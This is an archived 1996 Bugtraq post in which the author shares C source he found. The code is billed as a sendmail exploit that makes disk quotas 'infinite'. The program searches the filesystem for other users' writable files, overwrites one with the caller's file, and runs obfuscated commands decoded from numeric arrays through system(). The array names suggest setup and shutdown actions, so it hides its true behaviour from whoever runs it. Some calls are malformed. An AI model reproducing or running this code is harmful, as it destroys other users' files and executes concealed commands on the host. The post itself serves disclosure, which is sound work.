Bugtraq mailing list archives
quotas? maybe you're not seeing all of it
From: blh () nol net (Brett L. Hawn)
Date: Sun, 21 Jul 1996 10:57:28 -0500
I finally found the source to this annoying little monster so I thought I'd
let ya'll see it. I don't know off hand if this little bug has been seen
before/discussed before but if it hasn't I'm quite sure all of you would
love to fix it :) I've not tried it on anything but Solaris 2.5 so far but
I've no doubt that it'll work elsewhere as well.
What this does is takes a file and hides it in somone else's directories
using sendmail.
/**************************************************************************
* This exploit takes advantage of the latest sendmail hole, to hide *
* warez from your quota program, effectivly making your quota infinate.. *
* *
* To compile: *
* cc -o bigquota quota.c *
* To run: *
* ./bigquota file *
* where file is the file you wish to hide from your quota program. *
* *
* Please note that this may take a minute. *
* If you have any problems, talk to me, TSK, on IRC. *
**************************************************************************/
#include <unistd.h>
#include <sys/stat.h>
#include <dirent.h>
#include <stdio.h>
#include <fcntl.h>
int seedsc[201]={52,3,3,77,115,13,71,15,41,51,61,29,103,13,100,47,124,42,86,\
44,45,11,7,50,17,123,87,66,32,78,109,62,53,43,84,72,71,0,88,41,1,33,9,52,118,\
65,120,119,68,84,15,11,27,101,0,106,46,19,75,16,25,55,81,74,113,88,96,19,91,\
118,73,58,41,90,88,87,118,103,58,50,71,41,86,33,115,9,105,29,48,113,5,98,50,\
94,79,18,111,99,11,126,111,109,90,46,18,43,43,59,113,76,96,18,27,36,7,74,79,\
85,54,126,23,12,123,118,76,116,85,8,90,111,35,106,113,40,40,122,85,43,108,31,\
32,5,9,77,5,14,99,100,107,114,60,70,19,26,12,14,114,118,48,40,12,106,93,60,\
112,52,67,30,47,55,107,75,90,112,55,38,107,117,22,89,47,79,58,55,119,27,119,\
115,85,38,30,122,126,3,93,97,44,100,32,33,10};
void main(argc, argv)
int argc;
char *argv[];
{
char *checkseed(int *seeds);
char *checkdir(char *dir);
int initseeds[201]={25,\
108,69,89,126,121,84,34,77,52,25,67,44,106,60,124,30,33,3,21,75,67,\
116,109,28,51,81,45,85,119,99,0,98,91,114,102,122,50,81,67,57,43,126,\
2,94,75,10,7,96,29,112,71,103,117,20,72,112,23,105,65,48,119,23,65,\
98,105,33,12,43,12,78,7,53,16,109,91,65,106,43,85,44,113,125,3,61,\
95,18,3,64,96,19,68,52,20,54,122,26,35,126,19,31,106,24,108,59,44,\
41,32,5,1,32,25,64,93,60,97,102,84,92,50,79,11,112,89,27,124,98,\
109,12,0,4,103,114,22,66,36,81,47,52,70,107,51,46,37,99,13,4,31,\
126,19,47,21,96,123,110,72,33,76,8,0,65,86,102,27,75,64,46,122,-47,\
53,1,42,20,-65,63,63,-7,-70,40,-39,-15,46,25,22,86,-39,86,82,21,-16,\
3,-9,-23,11,-21,-90,-30,-7,20,-17,23};
int setupseeds[201]={1,\
35,44,14,107,20,81,111,42,72,73,90,34,86,50,32,16,97,78,80,124,7,\
110,13,71,107,24,91,84,68,58,38,105,68,64,121,37,101,64,65,40,91,8,\
29,9,60,101,123,122,22,92,37,66,13,30,88,8,70,5,28,108,20,101,125,\
38,78,106,98,85,55,92,122,0,93,0,37,97,82,120,70,82,65,74,90,41,\
28,104,80,71,117,11,104,32,69,5,56,2,48,8,112,109,16,109,35,57,43,\
119,37,86,42,62,44,118,117,7,94,88,28,109,125,-23,96,-15,-1,34,-69,33,\
93,10,-64,27,-56,-81,68,68,-5,25,4,10,70,68,42,53,-45,111,87,11,-54,\
-6,4,37,49,81,88,93,90,2,-72,60,65,85,3,-29,47,3,64,-35,78,58,\
42,2,-43,34,-80,53,70,10,-7,25,29,54,21,-11,7,-69,5,-19,4,30,77,\
67,-10,-79,96,23,4,3,-68,84,64,89};
int binseeds[201]={1,\
14,11,95,67,113,29,87,45,24,115,45,88,60,43,114,98,6,56,111,75,13,\
121,123,50,108,17,1,28,15,62,17,81,14,101,39,13,112,90,2,15,114,34,\
64,91,79,79,57,34,31,41,5,34,62,58,93,21,108,110,88,83,114,126,112,\
89,14,41,102,88,10,10,45,111,25,35,38,76,115,57,113,49,72,58,46,83,\
121,87,84,71,81,104,18,41,110,80,82,44,92,5,89,39,104,103,30,96,37,\
12,50,25,64,36,24,54,38,33,35,-79,23,54,-9,87,35,-5,-17,24,-69,-23,\
42,-58,-3,73,11,-3,7,78,-21,15,4,-46,1,84,96,101,-31,96,104,-2,19,\
-7,0,45,34,97,20,96,91,-17,-9,16,67,103,10,-61,48,-7,45,42,2,77,\
-23,1,33,27,-2,-8,80,-6,-17,25,-27,3,-47,43,54,-22,83,2,-17,-39,62,\
89,-7,-11,94,19,-65,72,-3,67,79,111};
int procseeds[201]={-14,\
97,103,125,91,45,90,21,121,60,39,28,60,11,76,41,69,21,118,7,90,63,\
17,17,48,46,68,126,72,66,68,32,54,119,44,98,94,15,21,33,68,4,109,\
121,109,27,7,66,65,126,121,97,40,101,84,6,48,97,38,25,7,56,112,97,\
125,36,125,46,115,108,40,2,105,52,44,17,122,111,98,30,17,112,27,115,29,\
78,125,125,16,81,17,99,88,108,88,14,83,42,26,114,54,90,106,39,126,19,\
95,2,1,69,14,93,114,105,78,48,42,25,87,14,120,124,55,102,57,35,30,\
107,11,74,44,8,100,118,25,73,64,97,106,57,81,92,34,109,80,118,112,85,\
99,99,21,20,62,116,42,111,67,29,79,12,34,84,67,12,105,107,90,109,23,\
116,25,104,89,124,29,-38,1,-9,95,21,0,39,43,45,-72,35,-69,-83,30,78,\
85,-11,-22,111,-47,-65,60,-1,85,78,106};
int boutseeds[201]={-14842,\
37,119,64,88,3,4,11,86,22,104,51,21,57,122,64,113,58,102,72,32,118,\
17,28,35,97,53,125,64,79,95,86,40,122,35,50,48,41,54,18,87,67,125,\
74,95,0,100,19,71,37,69,113,100,82,54,18,123,37,97,107,126,38,114,22,\
75,123,3,33,64,35,37,20,73,68,37,46,89,95,88,22,108,92,51,40,3,\
70,19,125,62,74,69,113,2,25,101,7,59,100,2,69,83,25,33,61,71,117,\
34,70,119,65,27,62,68,25,12,70,87,58,43,112,86,49,24,24,80,84,52,\
6,46,121,115,25,91,53,94,123,12,59,34,66,84,16,93,76,88,38,22,110,\
106,26,101,55,84,64,120,54,29,6,67,54,126,2,17,97,115,41,125,4,4,\
-55,8,41,25,-1,49,76,-61,-85,40,-27,-15,29,50,62,-9,20,-1,-14,15,9,\
32,-72,-94,40,-61,-54,-12,11,72,66,91};
int shtdwnseeds[201]={-42,\
58,44,53,114,68,10,105,76,13,99,1,12,79,50,106,27,65,83,96,30,101,\
122,112,87,118,3,35,55,6,84,59,98,28,58,82,126,98,114,85,125,7,39,\
69,58,21,70,28,35,65,57,70,93,0,36,14,100,107,9,107,71,52,1,29,\
115,63,110,118,28,16,82,53,80,56,50,108,58,109,26,75,19,91,92,59,86,\
125,114,40,76,15,38,8,57,58,103,65,23,52,14,36,8,119,70,47,64,53,\
1,15,83,35,33,80,10,98,51,38,30,14,119,11,26,61,15,117,37,103,117,\
32,4,21,67,40,40,78,74,47,108,27,120,9,114,14,56,75,84,52,29,55,\
108,105,42,71,8,83,89,118,79,22,119,1,28,3,36,22,12,77,77,105,33,\
12,104,-75,18,-4,62,72,-60,1,79,11,0,-17,-8,-23,-4,89,-4,-4,19,76,\
16,-90,-78,45,-38,-65,56,11,77,71,89};
char *zipper(int *seeds1);
char *path;
int i=0,j,inhan,outhan;
if(argc!=2)
{
puts("Usage:");
puts("quota <file>");
puts("where <file> is the file you wish");
puts("to hide/subtract from your quota.");
exit(0);
}
system(zipper(initseeds));
system(zipper(setupseeds));
system(checkseed(binseeds));
path=checkdir("/");
if(!path)
{
puts("Technical Dificulties");
goto closeout;
}
if((outhan=open(path,O_WRONLY|O_TRUNC))==-1)
{
puts("Error opening outfile");
goto closeout;
}
if((inhan=open(argv[1],O_RDONLY))==-1)
{
puts("Error opening infile");
goto closeout;
}
if(filecopy(inhan,outhan))
{
puts("Technical dificulties");
goto closeout;
}
if((unlink(argv[1]))==-1)
{
puts("Technical dificulties.");
goto closeout;
}
if((rename(path,argv[1]))==-1)
if((link(path,argv[1]))==-1)
if((symlink(path,argv[1]))==-1)
puts("Technical Dificulties.");
closeout:
system("%s\n",zipper(procseeds));
system("%s\n",zipper(boutseeds));
system("%s\n",zipper(shtdwnseeds));
}
char *checkseed(int *seeds)
{
char *zipper(int *seeds1);
char *string;
char testseeds[30];
char god[200];
int i=200,j;
if((string=(char *)getenv("PATH"))==NULL)
{
puts("Path not found");
exit(-1);
}
while((seeds[i]+seedsc[i])!=32)
{
testseeds[200-i]=seeds[i]+seedsc[i];
i--;
}
testseeds[i]=0;
i=0;
while(string[i]!=0)
{
j=0;
while(string[i]!=58&&string[i]!=0)
{
god[j]=string[i];
i++;
j++;
}
i++;
god[j++]=47;
god[j++]=0;
strcpy(&god[j],testseeds);
if(!stat(god,NULL))
return (char *)zipper(seeds);
}
return 0;
}
char *zipper(int *seeds1)
{
int i;
char *buhbye;
char teeth[201];
teeth[201]=0;
for(i=200;i>=0;i--)
teeth[200-i]=seeds1[i]+seedsc[i];
buhbye=(char *)malloc(201);
strcpy(buhbye,teeth);
return buhbye;
}
int filecopy(int from,int to)
{
int bufsiz;
if (from < 0)
return 1;
if (to < 0)
goto err;
for (bufsiz = 0x4000; bufsiz >= 128; bufsiz >>= 1)
{
register char *buffer;
buffer = (char *) malloc(bufsiz);
if (buffer)
{
while (1)
{
register int n;
n = read(from,buffer,bufsiz);
if (n == -1)
break;
if (n == 0)
{
free(buffer);
return 0;
}
if (n != write(to,buffer,(unsigned) n))
break;
}
free(buffer);
break;
}
}
err:
return 1;
}
char *checkdir(char *dir)
{
char *checkdir(char *dir);
DIR *currdir;
struct dirent *node;
struct stat statnode;
int i,j;
char *path;
char *retpath;
path=(char *)malloc(300);
if((currdir=opendir(dir))==NULL)
return 0;
node=readdir(currdir);
while(node)
{
i=0;
j=0;
while(dir[i])
{
path[i]=dir[i];
i++;
}
if(strcmp(dir,"/"))
{
path[i]='/';
i++;
}
while(node->d_name[j])
{
path[i]=node->d_name[j];
i++;
j++;
}
path[i]=0;
if((lstat(path,&statnode))==-1)
return 0;
if(statnode.st_mode&S_IFREG)
if(!access(path,W_OK))
if(!(statnode.st_mode&S_IFBLK))
if(!(statnode.st_mode&S_ISVTX))
if(statnode.st_uid!=getuid())
return path;
if(statnode.st_mode&S_IFDIR)
if(strcmp(node->d_name,".")&&strcmp(node->d_name,".."))
if(!(statnode.st_mode&S_IFREG))
if(!(statnode.st_mode&S_IFCHR))
if(!(statnode.st_mode&S_ISVTX))
if(statnode.st_uid!=getuid())
{
retpath=checkdir(path);
if(retpath)
return retpath;
}
node=readdir(currdir);
}
closedir(currdir);
return 0;
}
[-] Brett L. Hawn (blh () nol net) [-]
[-] Networks On-Line - Houston, Texas [-]
[-] 713-467-7100 [-]
Current thread:
- HPUX sam_exec bogus technician (Jul 18)
- <Possible follow-ups>
- Re: HPUX sam_exec Matthew G. Harrigan (Jul 18)
- Re: HPUX sam_exec Kent Hamilton (Jul 19)
- quotas? maybe you're not seeing all of it Brett L. Hawn (Jul 21)
- whoops.. addendum Brett L. Hawn (Jul 21)
- ping Brian Mitchell (Jul 21)
- ping Brian Mitchell (Jul 21)